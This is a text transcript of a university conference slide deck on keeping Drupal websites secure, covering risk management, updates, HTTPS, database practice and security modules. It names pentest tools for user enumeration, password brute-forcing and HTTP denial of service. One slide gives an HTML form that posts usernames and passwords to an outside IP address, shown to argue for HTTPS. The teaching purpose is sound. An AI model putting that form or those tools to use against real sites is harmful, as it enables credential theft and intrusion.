one drupal in the bucket · 2018-11-16 · one drupal in the bucket: keeping web infrastructure...
TRANSCRIPT
![Page 1: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/1.jpg)
One Drupal In the Bucket:Keeping Web Infrastructure Safe from the Flood
Eric Samboy
Hayden Bacon
![Page 2: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/2.jpg)
2
The day I came to the USA
![Page 3: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/3.jpg)
3
Beautiful Country
![Page 4: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/4.jpg)
4
Ready for crossing the street?
![Page 5: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/5.jpg)
5
Quick Warmup
![Page 6: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/6.jpg)
6
Website Hacking Statistics
• 1.86 billion websites on the internet.
[0] https://www.securityweek.com/185-million-websites-infected-malware-any-time
[1] https://www.webarxsecurity.com/website-hacking-statistics-2018-february/
• 1% of these websites are known to be infected.
![Page 7: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/7.jpg)
7
How does SASG use Drupal?
• About 100 Drupal UA websites.
• UA Quickstart & UA Zen
![Page 8: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/8.jpg)
8
How big is Drupal?
• One of the largest open source communities in the world.
• Used by more than 1 million sites on the internet.
• 800 thousand Drupal 7.x
• 225 thousand Drupal 8.x
![Page 9: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/9.jpg)
9
Security Concerns
• Greater risk of being attacked.
• More vulnerabilities are discovered and exploited
• How do we keep our web infrastructure safe?
https://www.keycdn.com/blog/drupal-security
![Page 10: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/10.jpg)
10
Outline
• Our Drupal Security Policies• Drupal Modules
• Drupal Core
• Access Control
• Security Awareness
• UA Cybersecurity Framework• Risk Management & Analysis
• Security Best Practices
![Page 11: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/11.jpg)
11
Our Drupal Security Policies
• Keep Drupal and Modules updated
• Access Control
• Security Awareness
• Contributed Modules Installation
![Page 12: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/12.jpg)
12
Our Drupal Security Policies
Contributed Modules Installation
![Page 13: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/13.jpg)
13
Risk Management
• Guidance to mitigate cyber risks
National Institute of Standards and Technology (NIST) Framework
• Best practice
• Business continuity plan
https://confluence.arizona.edu/display/UAIS/UA+Cybersecurity+Framework+and+Risk+Assessment
![Page 14: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/14.jpg)
14
Risk Management
• Asset Management
• Business Environment
• Governance
• Risk Assessment
• Risk Management Strategy
![Page 15: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/15.jpg)
15
Risk Management
• Access Control
• Awareness & Training
• Data Security
• Policies & Procedures
• Maintenance
• Protective Technology
![Page 16: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/16.jpg)
16
Risk Management
• Anomalies & Events
• Continuous Monitoring
• Detection Processes
![Page 17: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/17.jpg)
17
Risk Management
• Response Planning
• Communications
• Analysis
• Mitigation
• Improvements
![Page 18: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/18.jpg)
18
Risk Management
• Recovery Planning
• Improvements
• Communications
![Page 19: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/19.jpg)
Conclusion
19
What to take away.
• Doors are only as secure as their locks.
• We all have the responsibility to follow best practice.
![Page 20: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/20.jpg)
And now…
20
Hayden will cover:
• Drupal Penetration Testing
• More Security Policies
• Drupal statistics
• Being afraid, but not too afraid
![Page 21: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/21.jpg)
Drupal Penetration Testing
21
1. What do we look for?
2. What tools do we use?
![Page 22: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/22.jpg)
Drupal Penetration Testing
22
What to look for• HTTP or HTTPS
• Drupal version
• PHP version
• Apache version
• OS version
• Reverse Proxies
• Custom Modules
• Passwords
![Page 23: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/23.jpg)
Drupal Penetration Testing
23
Drupwn
What tools we use
Enumeration tool:
• User enumeration
• Node enumeration
• Default files enumeration
• Module enumeration
• Theme enumeration
• Cookies support
• User-Agent support
• Basic authentication
support
• Request delay
• Enumeration range
• Logging
• Socks and HTTP proxy
support
![Page 24: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/24.jpg)
Drupal Penetration Testing
24
Drupwn
What tools we use
![Page 25: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/25.jpg)
Drupal Penetration Testing
25
X Brute Forcer
What tools we use
Brute force passwords for:
• WordPress
• Joomla
• Drupal
• OpenCart
• Magento
![Page 26: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/26.jpg)
Drupal Penetration Testing
26
What tools we useX Brute Forcer
![Page 27: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/27.jpg)
Drupal Penetration Testing
27
What tools we useX Brute Forcer
![Page 28: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/28.jpg)
Drupal Penetration Testing
28
What tools we useX Brute Forcer
![Page 29: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/29.jpg)
Drupal Penetration Testing
29
Switchblade HTTP DoS Tool
What tools we use
![Page 30: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/30.jpg)
Drupal Penetration Testing
30
OWASP Switchblade
What tools we use
![Page 31: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/31.jpg)
Drupal Penetration Testing
31
OWASP Switchblade
What tools we use
![Page 32: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/32.jpg)
32
More Drupal Security Policies
• Serve over HTTPS
• File permissions
• Secure connections
• Database Security
• Hardened HTTPS Security
• Drupal Security Modules
![Page 33: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/33.jpg)
33
More Drupal Security Policies
Why serve over HTTPS?
![Page 34: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/34.jpg)
34
More Drupal Security Policies
Why serve over HTTPS?
“All websites should use HTTPS, even
if they don't include private content,
sign-in pages, or credit card details.”- UK National Cyber Security Centre
[0] https://www.ncsc.gov.uk/blog-post/serve-websites-over-https-always
![Page 35: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/35.jpg)
35
More Drupal Security Policies
Why serve over HTTPS?
[0] https://www.ncsc.gov.uk/blog-post/serve-websites-over-https-always
![Page 36: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/36.jpg)
36
More Drupal Security Policies
Why serve over HTTPS?
<form action=“http://34.218.2.81/notyourform” method=“POST”>
<input name=“username” value=“username”>
<input name=“password” value=“password”>
</form>
![Page 37: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/37.jpg)
37
More Drupal Security Policies
Why serve over HTTPS?<!-- Google Analytics -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-XXXXX-Y', 'auto');
ga('send', 'pageview');
</script>
<!-- End Google Analytics -->
![Page 38: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/38.jpg)
38
More Drupal Security Policies
Why serve over HTTPS?
![Page 39: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/39.jpg)
39
More Drupal Security Policies
Use only secure connections:
![Page 40: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/40.jpg)
40
More Drupal Security Policies
Use only secure connections:
![Page 41: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/41.jpg)
41
More Drupal Security Policies
Databases:
![Page 42: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/42.jpg)
42
More Drupal Security Policies
Database Best Practices:
• Use different database credentials between environments.
• Use a longer random password, which should not contain
special characters, except : @ . , / + - ! =
• Use a random table name prefix.
![Page 43: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/43.jpg)
43
More Drupal Security Policies
HTTP Strict-Transport-Security:
![Page 44: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/44.jpg)
44
More Drupal Security Policies
Public Key Pinning:
![Page 45: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/45.jpg)
45
More Drupal Security Policies
These modules can help you:
• Login Security: Limit number of login attempts and deny access by IP address.
• ACL: Access control lists for access to nodes.
• Password policy: Define more security password policies for users.
• Captcha: Block form submissions from spambots/scripts.
• Automated Logout: Allows administrator ability to log out users after specified time period.
• Session Limit: Limit the number of simultaneous sessions per user.
• Content Access: Permissions for content types by role and author.
• Coder: Checks your Drupal code against coding standard and best practices.
• SpamSpan filter: Obfuscates email address to help prevent spambots from collecting them.
• Hacked!: Check to see if there have been changes to Drupal core or themes.
![Page 46: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/46.jpg)
46
326 Vulnerabilities Reported
![Page 47: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/47.jpg)
47
326 Vulnerabilities Reported
[0] https://www.cvedetails.com/vendor/1367/Drupal.html
![Page 48: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/48.jpg)
48
328 Vulnerabilities Reported
[0] https://www.cvedetails.com/vendor/1367/Drupal.html
![Page 49: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/49.jpg)
What are attackers using?
49[0] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
![Page 50: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/50.jpg)
What are attackers using?
50
Backdoor: Artifacts used to re-infect or retain
access.
![Page 51: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/51.jpg)
What are attackers using?
51
Backdoor: Artifacts used to re-infect or retain
access.
Malware: Generic browser-side code to trigger
malware downloads.
![Page 52: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/52.jpg)
What are attackers using?
52
Backdoor: Artifacts used to re-infect or retain
access.
Malware: Generic browser-side code to trigger
malware downloads.
SEO Spam: Create dummy content with
backlinks to another website, to boost SEO.
![Page 53: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/53.jpg)
What are attackers using?
53
Mailer: Abuse server resources to send spam
email.
![Page 54: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/54.jpg)
What are attackers using?
54
Mailer: Abuse server resources to send spam
email.
Phishing: Attempts to trick users into sharing
sensitive information.
![Page 55: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/55.jpg)
55
Drupal is Lucky
[0] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf
![Page 56: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/56.jpg)
56
% of top 10M websites CMS Market Share
[0] https://w3techs.com/technologies/overview/content_management/all
Drupal is Lucky
![Page 57: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/57.jpg)
57
Drupal is Lucky
[1] https://sucuri.net/reports/Sucuri-Hacked-Report-2017.pdf[0] https://w3techs.com/technologies/overview/content_management/all
![Page 58: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/58.jpg)
58
Drupal is Lucky1. Alex Bronstein (effulgentsia) - IRC nick: effulgentsia, Organization: Acquia
2. Alex Pott (alexpott) - IRC nick: alexpott, Organization: Acro Media, Thunder
3. Angie Byron (w ebchick) - IRC nick: w ebchick, Organization: Acquia
4. Ben Dougherty (benjy) - IRC nick: benjy, Organization: PreviousNext
5. Ben Jeavons (coltrane) - IRC nick: coltrane, Organization: CARD.com6. Cash Williams (cashwilliams) - IRC nick: CashWilliams, Organization: Acquia
7. Cathy Theys (YesCT) - IRC nick: YesCT, Organization: BlackMesh
8. Chris McCafferty (cilefen) - IRC nick: cilefen, Organization: Institute for Advanced Study
9. Damien McKenna (DamienMcKenna) - IRC nick: dmckenna, Organization: Mediacurrent
10. Dan Smith (galooph) - IRC nick: galooph, Organization: Code Enigma11. Dave Reid (Dave Reid) - IRC nick: davereid, Organization: Lullabot
12. David Rothstein (David_Rothstein) - IRC nick: David_Rothstein, Organization:
13. David Snopek (dsnopek) - IRC nick: dsnopek, Organization: myDropWizard
14. David Stoline (dstol) - IRC nick: dstol, Organization: Acquia
15. David Strauss (David Strauss) - IRC nick: davidstrauss, Organization: GetPantheon16. Dries Buytaert (Dries) - IRC nick: Dries__, Organization: Acquia
17. Gerhard Killesreiter ([email protected]) - IRC nick: killes, Organization:
18. Greg Knaddison (greggles) - IRC nick: greggles, Organization: CARD.com
19. Heine Deelstra (Heine) - IRC nick: Heine, Organization: LimoenGroen
20. Ivo Van Geertruyen (mr.baileys) - IRC nick: mrbaileys, Organization: Calibrate21. James Gilliland (neclimdul) - IRC nick: neclimdul, Organization: APQC
22. Lee Row lands (larowlan) - IRC nick: larow lan, Organization: PreviousNext
23. Michael Hess (mlhess) - IRC nick: digiv, Organization: University of Michigan
24. Mike Potter (mpotter) - IRC nick: mpotter, Organization: Phase2
25. Mori Sugimoto (dokumori) - IRC nick: dokumori, Organization: Share & Thrive26. Moshe Weitzman (moshe w eitzman) - IRC nick: moshe_w ork, Organization:
27. Nathaniel Catchpole (catch) - IRC nick: catch, Organization: Tag1 Consulting
28. Neil Drumm (drumm) - IRC nick: drumm, Organization: Drupal Association
29. Peter Wolanin (pw olanin) - IRC nick: pw olanin, Organization: BioRAFT
30. Stefan Ruijsenaars (stefan.r) - IRC nick: stefan_r, Organization: Ruijsenaars Development31. Stella Pow er (stella) - IRC nick: stella, Organization: Annertech
32. xjm (xjm) - IRC nick: xjm, Organization: Acquia
![Page 59: One Drupal In the Bucket · 2018-11-16 · One Drupal In the Bucket: Keeping Web Infrastructure Safe from the Flood Eric Samboy Hayden Bacon](https://reader033.vdocument.in/reader033/viewer/2022041919/5e6b159194a23b743b2a6171/html5/thumbnails/59.jpg)
59
In Conclusion